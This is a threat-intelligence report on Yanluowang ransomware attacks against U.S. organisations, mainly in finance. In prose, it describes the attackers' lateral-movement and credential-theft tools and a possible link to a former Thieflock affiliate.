Yanluowang: Further Insights on New Ransomware Threat

By Symantec Threat Hunter Team

December 1, 2021

At least one attacker now using Yanluowang may have previously been linked to Thieflock ransomware operation.

Yanluowang, the ransomware recently discovered by Symantec, a division of Broadcom Software, is now being used by a threat actor that has been mounting targeted attacks against U.S. corporations since at least August 2021. The attacker uses a number of tools, tactics, and procedures (TTPs) that were previously linked to Thieflock ransomware attacks, suggesting that they may have been a Thieflock affiliate who shifted allegiances to the new Yanluowang ransomware family.

The attackers have been heavily focused on organizations in the financial sector but have also targeted companies in the manufacturing, IT services, consultancy, and engineering sectors.

Lateral movement

In most cases, PowerShell is used to download tools to compromised systems including BazarLoader to assist in reconnaissance. The attackers then enable RDP via registry to enable remote access. After gaining initial access, the attackers usually deploy ConnectWise (formerly known as ScreenConnect), a legitimate remote access tool.

In order to perform lateral movement and identify systems of interest, such as the victimís Active Directory server, the attackers deploy Adfind, a free tool that can be used to query Active Directory, and SoftPerfect Network Scanner (netscan.exe), a publicly available tool used for discovery of hostnames and network services.

The next phase of the attack is credential theft and the attackers use a wide range of credential-stealing tools, including:

  • GrabFF: A tool that can dump passwords from Firefox
  • GrabChrome: A tool that can dump passwords from Chrome
  • BrowserPassView: A tool that can dump passwords from Internet Explorer and a number of other browsers

Along with these tools, the attackers also use a number of open-source tools such as KeeThief, a PowerShell script to copy the master key from KeePass. In some cases, customized versions of open-source credential-dumping tools were also observed (secretsdump.exe). Credentials were also dumped from the registry.

In addition, the attackers have also used a number of other data capture tools, including a screen capture tool and a file exfiltration tool (filegrab.exe). Cobalt Strike Beacon was also deployed against at least one targeted organization.

Other tools used include ProxifierPE, which can be used to proxy connections back to attacker-controlled infrastructure, and the free, Chromium-based Cent web browser.

The Thieflock connection

There is a tentative link between these Yanluowang attacks and older attacks involving Thieflock, ransomware-as-a-service developed by the Canthroid (aka Fivehands) group. Several TTPs used by these attackers overlap with TTPs used in Thieflock attacks, including:

  • Use of custom password recovery tools such as GrabFF and other open-source password dumping tools
  • Use of open-source network scanning tools (SoftPerfect Network Scanner)
  • Use of free browsers, such as s3browser and Cent browser

This link begs the question of whether Yanluowang was developed by Canthroid. However, analysis of Yanluowang and Thieflock does not provide any evidence of shared authorship. Instead, the most likely hypothesis is that these Yanluowang attacks may be carried out by a former Thieflock affiliate.

Terms of Use | Copyright © 2002 - 2021 CONSTITUENTWORKS SM  CORPORATION. All rights reserved. | Privacy Statement